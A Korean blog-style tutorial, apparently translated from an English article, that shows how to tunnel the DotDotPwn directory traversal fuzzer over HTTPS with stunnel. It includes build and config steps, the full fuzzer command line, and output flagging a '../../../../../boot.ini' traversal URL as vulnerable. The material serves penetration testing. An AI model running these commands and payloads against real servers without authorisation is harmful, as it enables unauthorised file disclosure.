DotDotPwn 의 https 모드

3601 단어 https
참고:
http://www.spentera.com/2012/03/directory-traversal-with-dotdotpwn-https-mode/
https://www.stunnel.org/howto.html
stunnel 프로그램 사용,stunnel 참조
https://www.stunnel.org/index.html
stunnel 은 kali 기본 프로그램 입 니 다.
통과 가능
페이지 다운로드 설치
바 이 너 리 파일 생 성:
1. wget https://www.stunnel.org/downloads/stunnel-5.07.tar.gz
2. tar vxf stunnel-5.07.tar.gz
3. cd stunnel-5.07/
4. ./configure
5. make
6. make install

SSL pem 파일 생 성
root@kali:~# openssl req -new -x509 -days 365 -nodes -out stunnel.pem -keyout stunnel.pem

설정 매개 변수:
root@kali:~# cat stunnel.conf
cert = /root/stunnel.pem
#Some security enhancements for UNIX systems - comment them out on Win32
client = yes
#options=NO_SSLv2
debug = 5

; Service-level configuration
[https]
accept = 127.0.0.1:8080
connect = 206.190.36.45:443

[주의]이곳 에서 사용 하 는 206.190.36.45 는 야후 의 ip 로 실제 환경 에서 필요 한 IP 로 교체 해 야 합 니 다.
실행 stunnel
bash-3.2# stunnel /opt/local/etc/stunnel/stunnel.conf

오류 가 없 으 면 로그 표시 가 없습니다.
HTTPS 프로 토 콜 검증:
root@kali:~# nc 127.0.0.1 8080
GET / HTTP/1.1
Host:yahoo.com

HTTP/1.1 301 Redirect
Date: Wed, 05 Nov 2014 14:24:54 GMT
Via: http/1.1 ir8.fp.gq1.yahoo.com (ApacheTrafficServer)
Server: ATS
Location: https://www.yahoo.com/
Content-Type: text/html
Content-Language: en
Cache-Control: no-store, no-cache
Connection: keep-alive
Content-Length: 1450

그리고 dotpwn 테스트 를 진행 할 수 있 습 니 다:
bash-3.2# perl dotdotpwn.pl -m http-url -h 127.0.0.1 -x 8080 -O -s -u http://127.0.0.1:8080/cms/print.php?page=TRAVERSAL -k WINDOWS -b -q

[+] Report name: Reports/127.0.0.1_03-18-2012_23-59.txt

[========== TARGET INFORMATION ==========]
[+] Hostname: 127.0.0.1
[+] Detecting Operating System (nmap) ...
[+] Operating System detected: 
[+] Protocol: http
[+] Port: 8080
[+] Service detected:
Apache/2.2.4 (Win32) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.8d mod_autoindex_color PHP/5.2.1
[=========== TRAVERSAL ENGINE ===========]
[+] Creating Traversal patterns (mix of dots and slashes)
[+] Multiplying 6 times the traversal patterns (-d switch)
[+] Creating the Special Traversal patterns
[+] Translating (back)slashes in the filenames
[+] Adapting the filenames according to the OS type detected (generic)
[+] Including Special sufixes
[+] Traversal Engine DONE ! - Total traversal tests created: 14640

[=========== TESTING RESULTS ============]
[+] Ready to launch 3.33 traversals per second
[+] Press Enter to start the testing (You can stop it pressing Ctrl + C)

[+] Replacing "TRAVERSAL" with the traversals created and sending
. . 
[*] Testing URL: http://127.0.0.1:8080/cms/print.php?page=../../../../../boot.ini <== VULNERABLE

[+] Fuzz testing finished after 0.08 minutes (5 seconds)
[+] Total Traversals found: 1
[+] Report saved: Reports/127.0.0.1_03-18-2012_23-59.txt

좋은 웹페이지 즐겨찾기